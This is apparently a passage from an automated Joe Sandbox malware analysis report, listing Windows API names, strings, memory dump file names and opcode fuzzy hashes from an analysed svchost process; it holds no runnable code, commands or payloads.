                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID: Dead
                                                        • API String ID: 756756679-1293411866
                                                        • Opcode ID: 16deceebbb86a4ee17dd3b940be503c67630b0e40e640d710b58a96d17f55941
                                                        • Instruction ID: 0d58e6c7b06e3a54d04d8329436024ef45801c87d925d1ec8da3a648c607d7f4
                                                        • Opcode Fuzzy Hash: 16deceebbb86a4ee17dd3b940be503c67630b0e40e640d710b58a96d17f55941
                                                        • Instruction Fuzzy Hash: 7031B132701B5182FF91DF56A54836D7BA0FB94B80F0841209F8D23B55EF3AD4A58B42
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID:
                                                        • API String ID: 517849248-0
                                                        • Opcode ID: 16d258a9ac026dd37d62bcd9d6c3911ef3c0b7ca7915ee34a9afe05dd31b2e3e
                                                        • Instruction ID: a8e0171c67a4090ba16aba086995a0a5f9f3aa4c4eb718285ba1c06af9c52706
                                                        • Opcode Fuzzy Hash: 16d258a9ac026dd37d62bcd9d6c3911ef3c0b7ca7915ee34a9afe05dd31b2e3e
                                                        • Instruction Fuzzy Hash: 98015771704A4082FAA0DB12F85835D7AA1F788BC1F888134DE8D63798DE3AC986CB41
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                        • String ID:
                                                        • API String ID: 449555515-0
                                                        • Opcode ID: 30c8d17d90bd3745ebdb1f35502c968551356a20b63a74c7033b0010c96071d1
                                                        • Instruction ID: 143900c74a0df011e25cc0b83d673d986b9b5014fc7cfd2f33c15e527db131aa
                                                        • Opcode Fuzzy Hash: 30c8d17d90bd3745ebdb1f35502c968551356a20b63a74c7033b0010c96071d1
                                                        • Instruction Fuzzy Hash: C611D775611B40D6FFA4DB25E81C72E7FB0AB88B46F080825C94D67764EF3EC5588B02
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FinalHandleNamePathlstrlen
                                                        • String ID: \\?\
                                                        • API String ID: 2719912262-4282027825
                                                        • Opcode ID: a3d7cacd1ebb440911515f68b3794a8df69f5abb31c63e6f26f50beb6be48af3
                                                        • Instruction ID: 2c744fe53c43a248a6804df52b1a5713068d28465468128cf141ac8cb254e403
                                                        • Opcode Fuzzy Hash: a3d7cacd1ebb440911515f68b3794a8df69f5abb31c63e6f26f50beb6be48af3
                                                        • Instruction Fuzzy Hash: 93F08C7234468192FBA0CB25E99835D7F60F784BC9F848020CA4C53958EE7EC688CF05
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CombinePath
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3422762182-91387939
                                                        • Opcode ID: 0fefe4693416a643ad9e70920ffc3e33abc3de2cb316a83794251c8f9330dfe7
                                                        • Instruction ID: 740eec389ae694c30906cdc4a70235e8303d7f674255944eb109aec758b9ec89
                                                        • Opcode Fuzzy Hash: 0fefe4693416a643ad9e70920ffc3e33abc3de2cb316a83794251c8f9330dfe7
                                                        • Instruction Fuzzy Hash: 76F08230704B80D2FE90CB13B90811D7E21EB48FD1F488131DE5E27B68DE2DC4818B02
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: e9186c1451144fd021b714c5c272bd718a2131959171b64afe02b1703c1f89a6
                                                        • Instruction ID: b1b204c9b3a76027ebfb515103c1ab1bb3bd2d4f4e351f9c0d0a1ba853116149
                                                        • Opcode Fuzzy Hash: e9186c1451144fd021b714c5c272bd718a2131959171b64afe02b1703c1f89a6
                                                        • Instruction Fuzzy Hash: ADF08C71721A00C1FFC4CF61E88C36C3F60EB88B52F481419990F67260DF2AC488DB02
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: 5eb0f69eaa28739e7a3b5d30c3b7e3077147b945ee367a274f52b7d5e5995563
                                                        • Instruction ID: 0e93d523014fe33429086a29fcd4ec5f8b25b04b5faab58ad0c4886581baa407
                                                        • Opcode Fuzzy Hash: 5eb0f69eaa28739e7a3b5d30c3b7e3077147b945ee367a274f52b7d5e5995563
                                                        • Instruction Fuzzy Hash: DE02CC36219B8086EBA0CB55E49435EBBA0F3D5794F204116EB8E97BA8DF7DC484CF01
                                                        APIs
                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0000026A879D09C2
                                                        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000026A879D093F,?,?,?,0000026A879CE263), ref: 0000026A879D0A80
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000026A879D093F,?,?,?,0000026A879CE263), ref: 0000026A879D0B0A
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                        • String ID:
                                                        • API String ID: 2210144848-0
                                                        • Opcode ID: 6ea8d1c03a27889c2a76d2fa2108f5730873fa6bd6da2ede6083719aa30d033f
                                                        • Instruction ID: 9785ada16f6ba613f265021b1b5f3b4dde76e450c38aa902d93f95b18eb431ac
                                                        • Opcode Fuzzy Hash: 6ea8d1c03a27889c2a76d2fa2108f5730873fa6bd6da2ede6083719aa30d033f
                                                        • Instruction Fuzzy Hash: 5181CF32610A5089FBD0DF69C8883AD7FA1F784B98F444156DE2A77791DB3AC441CF22
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: dbebcfa212769c950804440a44d24f2a92ce7775a833934e53173bcf02afa0e6
                                                        • Instruction ID: 4ee369ca84b0e94f961d075eefea6419c5e507c7228b4ca4eab765bd7bfc8873
                                                        • Opcode Fuzzy Hash: dbebcfa212769c950804440a44d24f2a92ce7775a833934e53173bcf02afa0e6
                                                        • Instruction Fuzzy Hash: E361DA36519B44C6EBA0CB15E45831EBBA4F3D8784F605216FA8E57BA8DB7EC540CF01
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000003.1826644218.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_3_26a87990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction ID: 3cba833c7c3e8635b78570d7036d81f2c335cee3c60ac54628be692665e7f048
                                                        • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction Fuzzy Hash: 1911A932AD2B1101F7D4122CE55E3ADB2F16B94774F184624EA77377DAFB1AC9414903
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction ID: d09477ec4ac729a0b8a5126bc7e50452c296aa99132a7193bf38e456d7ddac9c
                                                        • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction Fuzzy Hash: 81116932A54A0102F7E89624D55E36D7D606BA53B4F144635AF763B7D6CA1FC8C2C903
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModule
                                                        • String ID:
                                                        • API String ID: 1092925422-0
                                                        • Opcode ID: f49a43d8567c213b337cf74c33d87ea9f8b0f1b984059dad2b4cd4689300dbc7
                                                        • Instruction ID: 8cf684c279c47e5a316fbe476e5be281943219fab7ad6c2e1befb6ee7df75a20
                                                        • Opcode Fuzzy Hash: f49a43d8567c213b337cf74c33d87ea9f8b0f1b984059dad2b4cd4689300dbc7
                                                        • Instruction Fuzzy Hash: 4F115B3A704B4082FF949B25E44C2AE7AB0F788B95F084029DE8D17794EF3EC548CB06
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID: pid_
                                                        • API String ID: 517849248-4147670505
                                                        • Opcode ID: c190cf9c84f4fec237682ecde889163a3056c2ee0c0182666c83aa3720f1176d
                                                        • Instruction ID: 2943f072f88694575b776650e15300b126d3f9b990d1373b75b60a8a3de24066
                                                        • Opcode Fuzzy Hash: c190cf9c84f4fec237682ecde889163a3056c2ee0c0182666c83aa3720f1176d
                                                        • Instruction Fuzzy Hash: B4118E35300B40A1FF90DB25E90A39E7BA0F7C8780F8500219E4DA3798EF2AC915DF86
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Free
                                                        • String ID:
                                                        • API String ID: 3168794593-0
                                                        • Opcode ID: 675c280ff13286ce7d146578b7a03c3a8db6339f083b3ff198ff4cd99f23170e
                                                        • Instruction ID: a03360d1949d0afa7a791c42e6c64afc6343680673b3dd1a26165067a15b95fe
                                                        • Opcode Fuzzy Hash: 675c280ff13286ce7d146578b7a03c3a8db6339f083b3ff198ff4cd99f23170e
                                                        • Instruction Fuzzy Hash: BE011A76610B92C6E784DFA6E80815D7FB1F788F85F084425EA4E63B28EE39C455CB41
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 64816e4cd3ccee350da6ce7bbddcd7399f42add8e1b6bc9b0cc6ea827a19452e
                                                        • Instruction ID: ca24dbbf011402c8ccefec4d0567cec08fe62c6b451f17e144b73c72737f7b6c
                                                        • Opcode Fuzzy Hash: 64816e4cd3ccee350da6ce7bbddcd7399f42add8e1b6bc9b0cc6ea827a19452e
                                                        • Instruction Fuzzy Hash: 8571823220478186FFA4DF2699583EE77A5F3C9B84F440025DE49A7B99DF36C685CB02
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000003.1826644218.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_3_26a87990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: HIJKLMNOPQRSTUVWXYZ$bad array new length
                                                        • API String ID: 3215553584-4137334423
                                                        • Opcode ID: f0e5866417592c2ff8c3377a202dd0391a84e675177e715dfbe21364aa16f179
                                                        • Instruction ID: 7b41ddfce685e6d2e0c9efc9c6e4e9a83fb9321eebb737032e5b964e986635b1
                                                        • Opcode Fuzzy Hash: f0e5866417592c2ff8c3377a202dd0391a84e675177e715dfbe21364aa16f179
                                                        • Instruction Fuzzy Hash: 3661C13260964082FAF89B2891CE36D7BE8F785795F144425DA0A377A2DA3BC841CF13
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 15f2f4e0f9d638f158a96525c1ecafbceb1b9e2c8075581ad63209208a78af1e
                                                        • Instruction ID: eaeebad90c2e7299d721a9da3962111a9b8eda6252e0573b52ea7b3221bcf299
                                                        • Opcode Fuzzy Hash: 15f2f4e0f9d638f158a96525c1ecafbceb1b9e2c8075581ad63209208a78af1e
                                                        • Instruction Fuzzy Hash: 53518E362087C582EFA4DE25A46C3AF7B61F3D9780F440015DF8923B99EA7BC5859F42
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite
                                                        • String ID: U
                                                        • API String ID: 442123175-4171548499
                                                        • Opcode ID: f44db66318a18b3e6bf0bbc027b995569a44fb504c85fb8b49b9fe2e6159cddc
                                                        • Instruction ID: 5fffcb82b90d14cfdd4a8c7740e9cacbf46d68fa6c8f1ff5a458f01875668730
                                                        • Opcode Fuzzy Hash: f44db66318a18b3e6bf0bbc027b995569a44fb504c85fb8b49b9fe2e6159cddc
                                                        • Instruction Fuzzy Hash: 2B41B132714B8082EBA0DF29E8483AE7FA1F798794F854021EE4D97798DB3EC441CB41
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Stringtry_get_function
                                                        • String ID: LCMapStringEx
                                                        • API String ID: 2588686239-3893581201
                                                        • Opcode ID: 9eb651065806efa1f3c1ddeda68a4214a605e5c82d734f3d398dbc25806cdd5e
                                                        • Instruction ID: 7d742faf528b6f908273379c17201dcb0ec9fe9c21d1d042ae66690c57d519ef
                                                        • Opcode Fuzzy Hash: 9eb651065806efa1f3c1ddeda68a4214a605e5c82d734f3d398dbc25806cdd5e
                                                        • Instruction Fuzzy Hash: B7111D36608B8086DBA0CB15F84439EBBA5F7C9B84F544126EECD53B59CF38C5508B40
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFileHeaderRaise
                                                        • String ID: csm
                                                        • API String ID: 2573137834-1018135373
                                                        • Opcode ID: ba97a2cfb4494a9593318773eec94a3c4e74a75ef8f777109a467670aa1db902
                                                        • Instruction ID: 65b7e96918c5d13549ca4f3715c852b3524a5d3d4346eb6d8267ab721b452ad3
                                                        • Opcode Fuzzy Hash: ba97a2cfb4494a9593318773eec94a3c4e74a75ef8f777109a467670aa1db902
                                                        • Instruction Fuzzy Hash: 16113A32614B84C2EB618F25E54435DBBA4F798B94F588220EE8C17BA9DF3DC5518B00
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                        • String ID: InitializeCriticalSectionEx
                                                        • API String ID: 539475747-3084827643
                                                        • Opcode ID: e64e4740045ae81cdb2e514f923c51f250565fc9a097f0243aa16987f787090b
                                                        • Instruction ID: 5f10548da1aafae449b39f266b465961ba97e9037fa842d887f3319dc1a15934
                                                        • Opcode Fuzzy Hash: e64e4740045ae81cdb2e514f923c51f250565fc9a097f0243aa16987f787090b
                                                        • Instruction Fuzzy Hash: F3F05E35604B5081EBD49B51B54869D7E64AB88BD0F544125AE4923BA4DE3AC485CB02
                                                        APIs
